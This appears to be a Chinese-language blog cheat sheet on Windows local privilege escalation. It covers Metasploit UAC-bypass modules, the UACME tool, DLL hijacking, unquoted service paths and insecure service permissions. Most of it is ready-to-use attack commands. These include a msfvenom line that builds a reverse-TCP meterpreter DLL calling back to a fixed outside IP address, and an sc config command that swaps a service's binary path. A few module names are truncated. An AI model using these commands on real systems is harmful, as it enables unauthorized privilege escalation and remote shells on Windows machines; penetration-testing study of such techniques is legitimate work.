BypassUAC提权
MSF模块
UAC:用户控制机制
windows 7:
use exploit/windows/local/bypassua
get system
windows 10:
方法一:use exploit/windows/local/ask \钓鱼攻击,需要管理员在win10上点击确定
方法二:use exploit/windows/local/bypassuac_sluihijack
方法三:use exploit/windows/local/bypassuac_silentcleanup
UACME 项目
https://github.com/hfiref0x/UACME
Akagi64.exe 41 msf1.exe \Akagi64.exe 编号 调用执行(在被攻击主机上执行) 41数字可替换,常见23 61 41
getsystem (在MSF上执行)
DLL劫持提权
提前信息收集相关第三方软件及DLL问题程序,本地调试成功后覆盖DLL实现利用
过程:信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功
检测: ChkDllHijack 火绒剑
项目:https://github.com/anhkgg/anhkgg-tools
利用火绒剑进行进程分析加载DLL,一般寻找程序DLL利用。
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=4444 -f dll -o xiaodi.dll
引号路径提权
服务路径如果不带引号:空格以后的会被当作参数,不再是一个整体
如何寻找不带引号的服务路径:
可以利用的路径需要满足的条件:不含引号+含有空格
检测语句:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
不安全的服务提权
检测脚本:accesschk PowerUp(PowerSploit)
1、accesschk.exe -uwcqv "administrators" *
2、Import-Module .\PowerUp.ps1
Invoke-All Checks
https://github.com/411Hall/JAWS
https://github.com/PowerShellMafia/PowerSploit
sc config "test" binpath="C:\Program.exe"
sc start test
标签:exe,Windows,dll,DLL,提权,windows,本地用户,com
From: https://www.cnblogs.com/arongsec/p/17231136.html